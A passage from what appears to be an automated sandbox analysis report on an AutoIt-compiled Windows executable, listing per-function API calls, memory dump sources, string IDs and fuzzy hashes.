                                                                                                                                                                      • Instruction Fuzzy Hash: D1517B75904359EFCB16CFA9CC84EAEBBB9EF48310F14852DF94AA7250D731A940CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D93DF, Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003D91E9: __time64.LIBCMT ref: 003D91F3
                                                                                                                                                                        • Part of subcall function 00375045: _fseek.LIBCMT ref: 0037505D
                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 003D94BE
                                                                                                                                                                        • Part of subcall function 0039432E: __wsplitpath_helper.LIBCMT ref: 0039436E
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 003D94D1
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D94E4
                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 003D9509
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D951F
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D9532
                                                                                                                                                                        • Part of subcall function 003D922F: _memmove.LIBCMT ref: 003D9268
                                                                                                                                                                        • Part of subcall function 003D922F: _memmove.LIBCMT ref: 003D9277
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D9479
                                                                                                                                                                        • Part of subcall function 003D99BE: _wcscmp.LIBCMT ref: 003D9AAE
                                                                                                                                                                        • Part of subcall function 003D99BE: _wcscmp.LIBCMT ref: 003D9AC1
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003D96DC
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 003D974F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 003D9785
                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003D979B
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003D97AC
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003D97BE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1500180987-0
                                                                                                                                                                      • Opcode ID: f3641f23dcd3ca257e3f9b5470225d2933df05bf13856b8f2c977bd868ef7859
                                                                                                                                                                      • Instruction ID: 45000b72d2ff070eff187ed73a46dd6924ffd0fb3c2e36282618b275287469b9
                                                                                                                                                                      • Opcode Fuzzy Hash: f3641f23dcd3ca257e3f9b5470225d2933df05bf13856b8f2c977bd868ef7859
                                                                                                                                                                      • Instruction Fuzzy Hash: DEC12BB2900219AEDF22DF95DC85ADEB7BDEF45310F0040ABF609EB251DB709A448F65
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00376BEC, Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00390B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00376C6C,?,00008000), ref: 00390BB7
                                                                                                                                                                        • Part of subcall function 003748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003748A1,?,?,003737C0,?), ref: 003748CE
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00376D0D
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00376E5A
                                                                                                                                                                        • Part of subcall function 003759CD: _wcscpy.LIBCMT ref: 00375A05
                                                                                                                                                                        • Part of subcall function 0039387D: _iswctype.LIBCMT ref: 00393885
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                                                                      • Opcode ID: 4504667c2356318c4690f5438899e2f4667781d1a6a95195f323e2c40a9ff87b
                                                                                                                                                                      • Instruction ID: c970a5ea5ebd6b20417429b29227ab4b467a4b07d4b610d85ac86d286627f34c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4504667c2356318c4690f5438899e2f4667781d1a6a95195f323e2c40a9ff87b
                                                                                                                                                                      • Instruction Fuzzy Hash: A502BE311087419FC726EF24C891AAFBBE5FF99314F04891DF48A9B2A1DB34D949CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003745DF, Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003745F9
                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 003AD7CD
                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 003AD87D
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 003AD8C1
                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 003AD8CA
                                                                                                                                                                      • TrackPopupMenuEx.USER32(00436890,00000000,?,00000000,00000000,00000000), ref: 003AD8DD
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003AD8E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2751501086-0
                                                                                                                                                                      • Opcode ID: 90f4d7dbd07e800d10352be98cc67a9effcd48848b51bcbcaaf2c317d6c21208
                                                                                                                                                                      • Instruction ID: 1c0bc818dcd271510681f864331c649cd8e809bdc09b055ed46936fecf532628
                                                                                                                                                                      • Opcode Fuzzy Hash: 90f4d7dbd07e800d10352be98cc67a9effcd48848b51bcbcaaf2c317d6c21208
                                                                                                                                                                      • Instruction Fuzzy Hash: 29710970604205BEEB369F14DC45FAABF68FF06354F104216F51A6A5E0C7B5AC10DB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E8BC0, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E8BEC
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003E8C19
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 003E8C23
                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 003E8D23
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 003E8E50
                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00402C0C), ref: 003E8E84
                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00402C0C,?), ref: 003E8EA7
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 003E8EBA
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003E8F3A
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E8F4A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                      • String ID: ,,@
                                                                                                                                                                      • API String ID: 2395222682-2180730024
                                                                                                                                                                      • Opcode ID: 90a219d30971137735dad9a009f9b1f046b432e10cfe73b3f569a3f5da3d19ff
                                                                                                                                                                      • Instruction ID: e7cda206e4a26d7d907eb9b34949647a534e0a5d77b61155ed1efdeeb659266c
                                                                                                                                                                      • Opcode Fuzzy Hash: 90a219d30971137735dad9a009f9b1f046b432e10cfe73b3f569a3f5da3d19ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 74C14671608355AFC701DF65C884A2BB7E9FF88348F004A2DF9899B290DB71ED05CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F10A5, Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003F0038,?,?), ref: 003F10BC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                                                                      • Opcode ID: 61d31da4140bc846e062fb6ee30ef55839666c05d2ce42a8987865fb8ee10abe
                                                                                                                                                                      • Instruction ID: 4e6567ec76b8949ac9504553ffa6083f09bded6e5800fe54cb329b2a768e984b
                                                                                                                                                                      • Opcode Fuzzy Hash: 61d31da4140bc846e062fb6ee30ef55839666c05d2ce42a8987865fb8ee10abe
                                                                                                                                                                      • Instruction Fuzzy Hash: 87416A3021025EDFCF26EF94EC91AFA3724EF11340F518465FE915B292DB34A95ACBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CFCB1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003AE6C9,00000010,?,Bad directive syntax error,003FF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003CFCD2
                                                                                                                                                                      • LoadStringW.USER32(00000000,?,003AE6C9,00000010), ref: 003CFCD9
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • _wprintf.LIBCMT ref: 003CFD0C
                                                                                                                                                                      • __swprintf.LIBCMT ref: 003CFD2E
                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003CFD9D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                      • API String ID: 1506413516-4153970271
                                                                                                                                                                      • Opcode ID: 96698bb1dcdf837eebe1209ba994046ffad4317c178280c9aa0777550c7e7546
                                                                                                                                                                      • Instruction ID: 1358f8d551ab937632a560e03bb3f8b1af2ef75e0a4a4fdef91ae159c72fec24
                                                                                                                                                                      • Opcode Fuzzy Hash: 96698bb1dcdf837eebe1209ba994046ffad4317c178280c9aa0777550c7e7546
                                                                                                                                                                      • Instruction Fuzzy Hash: 69214F3290421EAFCF23EB90CC4AFEE7739BF14300F044466F519660A1DB759A58DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D5569, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                        • Part of subcall function 00377A84: _memmove.LIBCMT ref: 00377B0D
                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003D55D2
                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003D55E8
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003D55F9
                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003D560B
                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003D561C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SendString$_memmove
                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                                                                      • Opcode ID: 0a4b35e85b19ab2583a1a8afebefa9bb49dffe6563163af8d0d592dd2d1f2fcb
                                                                                                                                                                      • Instruction ID: 93b8abc213531acf7713417f1146c4f8226fb9730896121aba6c534937b032ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a4b35e85b19ab2583a1a8afebefa9bb49dffe6563163af8d0d592dd2d1f2fcb
                                                                                                                                                                      • Instruction Fuzzy Hash: D811082165016D7AD732F661EC49EFF7B7CEF91B00F90042BBC05A60C1DE684D04C5A5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D48F3, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                                                                      • Opcode ID: 78b191f3f5f5888b3b7065c0a22b20f036cf862598b39443a75ac47384879feb
                                                                                                                                                                      • Instruction ID: 9377014e123893a02a92f6a3743fba6ee339ddabf89d183f2819909d8cf08f7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 78b191f3f5f5888b3b7065c0a22b20f036cf862598b39443a75ac47384879feb
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E732904115AFCB23FB65EC46EEB77BCDF01750F1501B6F80596251EF719A81C651
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D5217, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM ref: 003D521C
                                                                                                                                                                        • Part of subcall function 00390719: timeGetTime.WINMM ref: 0039071D
                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 003D5248
                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 003D526C
                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003D528E
                                                                                                                                                                      • SetActiveWindow.USER32 ref: 003D52AD
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003D52BB
                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 003D52DA
                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 003D52E5
                                                                                                                                                                      • IsWindow.USER32 ref: 003D52F1
                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 003D5302
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                      • Opcode ID: f476ce189e5814eb676ce895a04938ecdca60035e7fa22afe8b0713af75798f1
                                                                                                                                                                      • Instruction ID: 86294b4e60f67d78e6d60a637e8fa673e33d4d3c96e14b12c5e51c3c26ad574f
                                                                                                                                                                      • Opcode Fuzzy Hash: f476ce189e5814eb676ce895a04938ecdca60035e7fa22afe8b0713af75798f1
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A21B0B2204605BFEB135F20FD88B363B6DEB0538BF012435F84182270CB619C14C629
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DD7F8, Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003DD855
                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003DD8E8
                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 003DD8FC
                                                                                                                                                                      • CoCreateInstance.OLE32(00402D7C,00000000,00000001,0042A89C,?), ref: 003DD948
                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003DD9B7
                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 003DDA0F
                                                                                                                                                                      • _memset.LIBCMT ref: 003DDA4C
                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 003DDA88
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003DDAAB
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 003DDAB2
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003DDAE9
                                                                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 003DDAEB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1246142700-0
                                                                                                                                                                      • Opcode ID: 64f394f723a7b517590b55258e9f3e4f7ba2f819456c22eb550c74422627d5cb
                                                                                                                                                                      • Instruction ID: fe2c8a7130510908be5267a9643c7773531912830af80540c311f1eeec55bc49
                                                                                                                                                                      • Opcode Fuzzy Hash: 64f394f723a7b517590b55258e9f3e4f7ba2f819456c22eb550c74422627d5cb
                                                                                                                                                                      • Instruction Fuzzy Hash: A8B10A75A00109AFDB15DFA4D889EAEBBB9EF48314F048569F90AEB351DB30ED41CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D052C, Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 003D05A7
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 003D0612
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003D0632
                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003D0649
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003D0678
                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003D0689
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003D06B5
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 003D06C3
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003D06EC
                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 003D06FA
                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003D0723
                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003D0731
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                      • Opcode ID: fa319801da4a8dd208a5eb018657a173addbea0692d1e85b1aa8d1266a76f672
                                                                                                                                                                      • Instruction ID: 41974fb87241dc34a22f27459a274f251233875a357ad4cf6b8aa4ae5bd10603
                                                                                                                                                                      • Opcode Fuzzy Hash: fa319801da4a8dd208a5eb018657a173addbea0692d1e85b1aa8d1266a76f672
                                                                                                                                                                      • Instruction Fuzzy Hash: CA514E62A0478829FB3ADBB0A4547EABFB48F02740F09459BC9C25B3C2D664DB4CCB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CC72A, Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC746
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003CC758
                                                                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003CC7B6
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC7C1
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003CC7D3
                                                                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003CC827
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC835
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003CC846
                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003CC889
                                                                                                                                                                      • GetDlgItem.USER32 ref: 003CC897
                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003CC8B4
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003CC8C1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
